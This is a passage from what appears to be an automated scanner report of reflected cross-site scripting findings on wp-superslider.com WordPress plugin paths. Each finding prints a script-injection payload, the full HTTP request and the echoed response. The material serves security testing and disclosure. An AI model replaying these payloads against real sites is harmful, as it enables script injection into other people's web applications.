<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00\"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css" />
...[SNIP]...

4.184. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87487"><script>alert(1)</script>39e89501d03 was submitted in the REST URL parameter 9. This input was echoed as 87487\"><script>alert(1)</script>39e89501d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487"><script>alert(1)</script>39e89501d03 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487\"><script>alert(1)</script>39e89501d03" />
...[SNIP]...

4.185. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea79a"><script>alert(1)</script>9de5f2df942 was submitted in the REST URL parameter 1. This input was echoed as ea79a\"><script>alert(1)</script>9de5f2df942 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /siteea79a"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/siteea79a\"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js" />
...[SNIP]...

4.186. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7c"><script>alert(1)</script>2271b17551d was submitted in the REST URL parameter 2. This input was echoed as 63b7c\"><script>alert(1)</script>2271b17551d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content63b7c"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content63b7c\"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js" />
...[SNIP]...

4.187. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc9a"><script>alert(1)</script>550f85bc728 was submitted in the REST URL parameter 3. This input was echoed as dfc9a\"><script>alert(1)</script>550f85bc728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsdfc9a"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsdfc9a\"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js" />
...[SNIP]...

4.188. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeafd"><script>alert(1)</script>0b49ecee366 was submitted in the REST URL parameter 4. This input was echoed as eeafd\"><script>alert(1)</script>0b49ecee366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menueeafd"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menueeafd\"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js" />
...[SNIP]...

4.189. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaa3"><script>alert(1)</script>cfbe353e491 was submitted in the REST URL parameter 5. This input was echoed as daaa3\"><script>alert(1)</script>cfbe353e491 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/jsdaaa3"><script>alert(1)</script>cfbe353e491/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/jsdaaa3\"><script>alert(1)</script>cfbe353e491/nav-follow-min.js" />
...[SNIP]...

4.190. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fcb6"><script>alert(1)</script>4b7a1a7b17f was submitted in the REST URL parameter 6. This input was echoed as 1fcb6\"><script>alert(1)</script>4b7a1a7b17f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6"><script>alert(1)</script>4b7a1a7b17f HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6\"><script>alert(1)</script>4b7a1a7b17f" />
...[SNIP]...

4.191. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d618f"><script>alert(1)</script>b5bbe65fee5 was submitted in the REST URL parameter 1. This input was echoed as d618f\"><script>alert(1)</script>b5bbe65fee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sited618f"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sited618f\"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js" />
...[SNIP]...

4.192. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed395"><script>alert(1)</script>4ecb0a29794 was submitted in the REST URL parameter 2. This input was echoed as ed395\"><script>alert(1)</script>4ecb0a29794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contented395"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contented395\"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js" />
...[SNIP]...

4.193. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf143"><script>alert(1)</script>7ab2e0b1bf was submitted in the REST URL parameter 3. This input was echoed as bf143\"><script>alert(1)</script>7ab2e0b1bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsbf143"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsbf143\"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js" />
...[SNIP]...

4.194. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b82fc"><script>alert(1)</script>dedd8e0a44b was submitted in the REST URL parameter 4. This input was echoed as b82fc\"><script>alert(1)</script>dedd8e0a44b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menub82fc"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menub82fc\"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js" />
...[SNIP]...

4.195. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75ce"><script>alert(1)</script>115e8e28446 was submitted in the REST URL parameter 5. This input was echoed as e75ce\"><script>alert(1)</script>115e8e28446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/jse75ce"><script>alert(1)</script>115e8e28446/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
